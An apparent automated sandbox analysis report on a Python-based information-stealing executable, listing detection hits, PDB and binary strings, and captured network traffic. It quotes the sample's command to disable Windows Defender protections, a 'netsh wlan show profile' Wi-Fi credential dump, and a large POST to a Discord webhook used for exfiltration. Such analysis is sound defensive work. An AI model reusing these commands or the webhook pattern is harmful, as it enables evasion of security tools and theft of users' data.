              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5988, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 5440, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process started Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ...

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7580, ProcessName: cmd.exe
              No Suricata rule has matched

              AV Detection

              barindex
              Source: 9g9LZNE4bH.exe Virustotal: Detection: 45%
              Source: 9g9LZNE4bH.exe ReversingLabs: Detection: 42%
              Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.3% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,70_2_00007FF6AA19901C
              Source: 9g9LZNE4bH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2405833236.00007FF8A8450000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: 9g9LZNE4bH.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2411047853.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000046.00000000.2310221598.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8CCC000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410652961.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409933422.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2408813480.00007FF8B7E01000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: 9g9LZNE4bH.exe, 00000002.00000002.2408503396.00007FF8A9356000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410441345.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409638089.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdbhPV source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2410254689.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409190880.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: 9g9LZNE4bH.exe, 00000002.00000002.2409408125.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1s 1 Nov 2022built on: Mon Jan 9 20:35:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A86AF000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2406298429.00007FF8A8731000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.pdb source: powershell.exe, 0000002A.00000002.2242595273.000001C03B705000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2409000197.00007FF8B7E21000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA592F0 FindFirstFileExW,FindClose,0_2_00007FF78DA592F0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA583B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF78DA583B0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA718E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF78DA718E4
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 2_2_00007FF78DA592F0 FindFirstFileExW,FindClose,2_2_00007FF78DA592F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,70_2_00007FF6AA1A46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,70_2_00007FF6AA19E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E88E0 FindFirstFileExA,70_2_00007FF6AA1E88E0
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYXnAAQrWNBsuZgspVDvCX9c HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 758909User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=5bfc7a42494d43b6e137242c97784aaf
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 04 Jan 2025 08:42:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735980157x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vZ14Lq5OBiciWTSQo3QtMCr%2F8X6cwJ9wf3eutoNvbb0uAqGNSo93Y2pDbjSfnVuwbbq1AS6zHs60gYT3NmAAz1hSRLLxOhdM29NfzXgzgGlPkE51o6SRN96372NZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=98f474b5012690ed569d92fa502bc01aa033d261-1735980156; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=MA7Uo7Wyd9dNQPITj.qM1rxHYjgtZpUmTVK4E25GdQk-1735980156106-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fc9efa42c6e176c-EWR
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000002.2414627174.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000002.2414627174.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: powershell.exe, 0000002A.00000002.2300518924.000001C0537FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: powershell.exe, 0000002A.00000002.2299859889.000001C053700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000002.2414627174.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F361E000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027742933.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027153929.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2027440588.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, python311.dll.0.dr, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: 